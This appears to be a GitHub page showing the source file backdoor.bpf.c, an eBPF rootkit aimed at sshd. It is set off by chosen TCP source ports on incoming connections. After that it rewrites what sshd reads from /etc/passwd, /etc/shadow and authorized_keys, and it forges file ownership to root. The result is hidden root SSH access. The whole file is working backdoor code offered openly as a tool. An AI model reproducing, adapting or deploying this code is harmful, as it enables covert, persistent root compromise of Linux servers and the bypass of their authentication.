-
Notifications
You must be signed in to change notification settings - Fork 11
/
backdoor.bpf.c
496 lines (452 loc) · 12.5 KB
/
backdoor.bpf.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h>
#include <bpf/bpf_endian.h>
#include "backdoor.maps.h"
#define logprefix "hide_ssh: "
#ifdef bpf_printk
#undef bpf_printk
#define bpf_printk(fmt, ...) \
({ \
char ____fmt[] = logprefix fmt; \
bpf_trace_printk(____fmt, sizeof(____fmt), \
##__VA_ARGS__); \
})
#endif
// Internal file identifiers
#define AUTHORIZED_KEYS 1
#define PASSWD 2
#define SHADOW 3
/*
Overwritting struct elem
*/
struct elem
{
int pid;
int fd;
unsigned long buff;
int buff_len;
int file_type;
struct stat *stat;
};
struct
{
__uint(type, BPF_MAP_TYPE_HASH);
__uint(max_entries, 4096);
__type(key, int); // pid_tgid
__type(value, struct elem); // elem
} pid_elem SEC(".maps");
/*
stat() struct pointer holder
*/
struct
{
__uint(type, BPF_MAP_TYPE_HASH);
__uint(max_entries, 4096);
__type(key, int); // pid_tgid
__type(value, long unsigned int); // struct stat
} path_stats SEC(".maps");
/*
Port Trigger
*/
struct accept_args
{
struct sockaddr_in *addr;
int ttl;
int backdoor_type;
};
struct
{
__uint(type, BPF_MAP_TYPE_HASH);
__uint(max_entries, 4);
__type(key, int); // simple key (Arbitrary 0)
__type(value, struct accept_args); // struct accept_args
} backdoor_trigger SEC(".maps");
SEC("tp/syscalls/sys_enter_openat")
int openat_entrypoint(struct trace_event_raw_sys_enter *ctx)
{
int file_type = 0;
int tgid = bpf_get_current_pid_tgid();
int pid = bpf_get_current_pid_tgid() >> 32;
char comm[10];
bpf_get_current_comm(&comm, 10);
if (comm[0] != 's' || comm[1] != 's' || comm[2] != 'h' || comm[3] != 'd')
{
return 0;
}
const int key = 0;
int *port_triggered = bpf_map_lookup_elem(&backdoor_trigger, &key);
if (port_triggered == 0)
{
return 0;
}
char check_filename[filename_len_max];
bpf_probe_read(&check_filename, filename_len_max, (char *)ctx->args[1]);
int is_passwd = 1;
/* passwd */
const char passwd[] = "/etc/passwd";
for (int i = 0; i < 11; i++)
{
if (passwd[i] != check_filename[i])
{
is_passwd = 0;
break;
}
}
if (is_passwd == 1)
{
file_type = PASSWD;
}
int is_shadow = 1;
/* shadow */
const char shadow[] = "/etc/shadow";
for (int i = 0; i < 11; i++)
{
if (shadow[i] != check_filename[i])
{
is_shadow = 0;
break;
}
}
if (is_shadow == 1)
{
file_type = SHADOW;
}
int is_auth_key = 0;
if (file_type == 0)
{
/* Auth_keys file */
int checking_auth_file = 0;
for (int i = 0; i < filename_len_max; i++)
{
if (checking_auth_file == 1)
{
if (i + 14 > filename_len_max)
{
break;
}
if (check_filename[i] == 'a' && check_filename[i + 1] == 'u' && check_filename[i + 2] == 't' && check_filename[i + 3] == 'h' && check_filename[i + 4] == 'o' && check_filename[i + 5] == 'r' && check_filename[i + 6] == 'i' && check_filename[i + 7] == 'z' && check_filename[i + 8] == 'e' && check_filename[i + 9] == 'd' && check_filename[i + 10] == '_' && check_filename[i + 11] == 'k' && check_filename[i + 12] == 'e' && check_filename[i + 13] == 'y' && check_filename[i + 14] == 's' && check_filename[i + 15] == 0)
{
is_auth_key = 1;
break;
}
else
{
checking_auth_file = 0;
}
}
if (check_filename[i] == '/')
{
checking_auth_file = 1;
}
// if null byte
if (check_filename[i] == 0)
{
break;
}
}
}
if (is_auth_key == 1)
{
file_type = AUTHORIZED_KEYS;
}
if (file_type == 0)
{ // not passwd or auth_keys
return 0;
}
struct elem value = {
.pid = pid,
.fd = ctx->args[0],
.buff = 0,
.buff_len = 0,
.file_type = file_type,
.stat = 0};
bpf_map_update_elem(&pid_elem, &tgid, &value, 0);
return 0;
}
SEC("tp/syscalls/sys_exit_openat")
int openat_exitpoint(struct trace_event_raw_sys_exit *ctx)
{
const int trigger_key = 0;
int tgid = bpf_get_current_pid_tgid();
struct elem *fd = bpf_map_lookup_elem(&pid_elem, &tgid);
if (fd == 0)
{
return 0;
}
struct elem *e = fd;
e->fd = ctx->ret;
if (ctx->ret < 0)
{
bpf_map_delete_elem(&pid_elem, &tgid);
bpf_map_delete_elem(&backdoor_trigger, &trigger_key);
return 0;
}
return 0;
}
SEC("tp/syscalls/sys_enter_close")
int close_entrypoint(struct trace_event_raw_sys_enter *ctx)
{
int tgid = bpf_get_current_pid_tgid();
struct elem *e = bpf_map_lookup_elem(&pid_elem, &tgid);
if (e == 0)
{
return 0;
}
if (e->fd == ctx->args[0])
{
bpf_map_delete_elem(&pid_elem, &tgid);
}
return 0;
}
SEC("tp/syscalls/sys_enter_newfstat")
int fstat_entrypoint(struct trace_event_raw_sys_enter *ctx)
{
int tgid = bpf_get_current_pid_tgid();
struct elem *e = bpf_map_lookup_elem(&pid_elem, &tgid);
if (e == 0)
{
return 0;
}
if (e->file_type == AUTHORIZED_KEYS && ctx->args[0] == e->fd)
{
e->stat = (struct stat *)ctx->args[1];
}
return 0;
}
SEC("tp/syscalls/sys_exit_newfstat")
int fstat_exitpoint(struct trace_event_raw_sys_exit *ctx)
{
int tgid = bpf_get_current_pid_tgid();
struct elem *e = bpf_map_lookup_elem(&pid_elem, &tgid);
if (e == 0)
{
return 0;
}
if (e->file_type == AUTHORIZED_KEYS && e->stat != 0)
{
struct stat stat;
bpf_probe_read(&stat, sizeof(struct stat), e->stat);
// Overwrite st_uid and st_gid
stat.st_uid = 0;
stat.st_gid = 0;
bpf_probe_write_user(e->stat, (void *)&stat, sizeof(struct stat));
// bpf_printk("OVERWRITTEN AUTHORIZED_KEYS STATS\n");
}
return 0;
}
// Folder stat
SEC("tp/syscalls/sys_enter_newstat")
int newstat_entrypoint(struct trace_event_raw_sys_enter *ctx)
{
int tgid = bpf_get_current_pid_tgid();
const int key = 0;
int *port_triggered = bpf_map_lookup_elem(&backdoor_trigger, &key);
if (port_triggered == 0)
{ // not actively triggered
return 0;
}
// am i sshd?
char comm[10];
bpf_get_current_comm(&comm, 10);
if (comm[0] != 's' || comm[1] != 's' || comm[2] != 'h' || comm[3] != 'd')
{
return 0;
}
// check if it's part of /home
char check_filename[filename_len_max];
bpf_probe_read(&check_filename, filename_len_max, (char *)ctx->args[0]);
if (check_filename[0] != '/' || check_filename[1] != 'h' || check_filename[2] != 'o' || check_filename[3] != 'm' || check_filename[4] != 'e')
{
return 0;
}
struct stat *statptr = (struct stat *)ctx->args[1];
bpf_map_update_elem(&path_stats, &tgid, &statptr, 0);
return 0;
}
SEC("tp/syscalls/sys_exit_newstat")
int newstat_exitpoint(struct trace_event_raw_sys_exit *ctx)
{
int tgid = bpf_get_current_pid_tgid();
long unsigned int *stat_struct = bpf_map_lookup_elem(&path_stats, &tgid);
if (stat_struct == 0)
{
return 0;
}
struct stat *stat_addr = (struct stat *)*stat_struct;
struct stat stat;
bpf_probe_read(&stat, sizeof(struct stat), stat_addr);
// Overwrite st_uid and st_gid
stat.st_uid = 0;
stat.st_gid = 0;
bpf_probe_write_user(stat_addr, (void *)&stat, sizeof(struct stat));
bpf_map_delete_elem(&path_stats, &tgid);
return 0;
}
SEC("tp/syscalls/sys_enter_read")
int read_entrypoint(struct trace_event_raw_sys_enter *ctx)
{
int tgid = bpf_get_current_pid_tgid();
struct elem *e = bpf_map_lookup_elem(&pid_elem, &tgid);
if (e == 0)
{
return 0;
}
if (e->fd != ctx->args[0])
{
return 0;
}
e->buff = ctx->args[1];
e->buff_len = ctx->args[2];
return 0;
}
SEC("tp/syscalls/sys_exit_read")
int read_exitpoint(struct trace_event_raw_sys_exit *ctx)
{
const int zero = PASSWD_FILE;
int tgid = bpf_get_current_pid_tgid();
if (ctx->ret < 0)
{
return 0;
}
struct elem *e = bpf_map_lookup_elem(&pid_elem, &tgid);
if (e == 0)
{
return 0;
}
struct accept_args *args = bpf_map_lookup_elem(&backdoor_trigger, &zero);
if (args == 0)
{
return 0;
}
int ttl = args->ttl;
int file_type = e->file_type;
if (file_type == AUTHORIZED_KEYS && args->backdoor_type == AUTH_BACKDOOR)
{
char *auth_key = bpf_map_lookup_elem(&auth_elem, &zero);
if (auth_key == 0)
{
return 0; // You should not be here
}
char *overwritten_content = auth_key;
int overwritten_content_len = 0;
for (int i = 0; i < 256; i++)
{ // TODO: Get it from userspace
if (overwritten_content[i] == 0)
{
overwritten_content_len = i;
break;
}
}
overwritten_content_len += 1;
// check if original auth_key file is large enough for our privkey
if (overwritten_content_len > ctx->ret)
{
bpf_map_delete_elem(&pid_elem, &tgid);
bpf_map_delete_elem(&backdoor_trigger, &zero);
return 0;
}
if (overwritten_content_len > 0 && overwritten_content_len < 256)
{
bpf_probe_write_user((void *)e->buff, (void *)overwritten_content, overwritten_content_len);
// bpf_printk("OVERWRITTEN AUTHORIZED_KEYS");
}
}
// We are giving UID 0 no matter what's the backdoor type
if (file_type == PASSWD || file_type == SHADOW)
{
int one = SHADOW_FILE;
struct file_block *file;
if (file_type == PASSWD)
{
file = bpf_map_lookup_elem(&files_elem, &zero);
}
else
{
file = bpf_map_lookup_elem(&files_elem, &one);
}
if (file == 0)
{
return 0; // You should not be here
}
int overwrite_len = 0; // need to reach to ctx->ret
for (int i = 0; i < 6500; i += 1) // arbitrary value
{
if (i + 1 > ctx->ret)
{
overwrite_len = i;
break;
}
}
if (overwrite_len > 0 && overwrite_len <= sizeof(file->buff) && overwrite_len <= ctx->ret)
{
bpf_probe_write_user((void *)e->buff, (void *)file->buff, overwrite_len);
}
}
bpf_map_delete_elem(&pid_elem, &tgid);
if (ttl == 1)
{
bpf_map_delete_elem(&backdoor_trigger, &zero);
}
else
{
args->ttl = ttl - 1;
}
return 0;
}
/*
Trigger UID from tcp src port
*/
SEC("tp/syscalls/sys_enter_accept")
int accept_entrypoint(struct trace_event_raw_sys_enter *ctx)
{
char comm[10];
bpf_get_current_comm(&comm, 10);
if (comm[0] != 's' || comm[1] != 's' || comm[2] != 'h' || comm[3] != 'd')
{
return 0;
}
struct sockaddr_in *addr = (struct sockaddr_in *)ctx->args[1];
struct accept_args args = {
.addr = addr,
.ttl = 10, // doing a little hack
.backdoor_type = 0};
const int key = 0;
bpf_map_update_elem(&backdoor_trigger, &key, &args, 0);
return 0;
}
SEC("tp/syscalls/sys_exit_accept")
int accept_exitpoint(struct trace_event_raw_sys_exit *ctx)
{
char comm[10];
bpf_get_current_comm(&comm, 10);
if (comm[0] != 's' || comm[1] != 's' || comm[2] != 'h' || comm[3] != 'd')
{
return 0;
}
const int key = 0;
struct accept_args *args = bpf_map_lookup_elem(&backdoor_trigger, &key);
if (args == 0)
{
return 0;
}
struct sockaddr_in read = {
.sin_family = 0,
.sin_port = 0,
.sin_addr = {0}};
bpf_probe_read(&read, sizeof(struct sockaddr_in), args->addr);
unsigned short port = __bpf_ntohs(read.sin_port);
int *bk_type = bpf_map_lookup_elem(&trigger_ports, &port);
if (bk_type == 0)
{
bpf_map_delete_elem(&backdoor_trigger, &key);
return 0;
}
if (*bk_type > 0 && *bk_type < 3)
{
args->backdoor_type = *bk_type;
}
return 0;
}
char LICENSE[] SEC("license") = "GPL";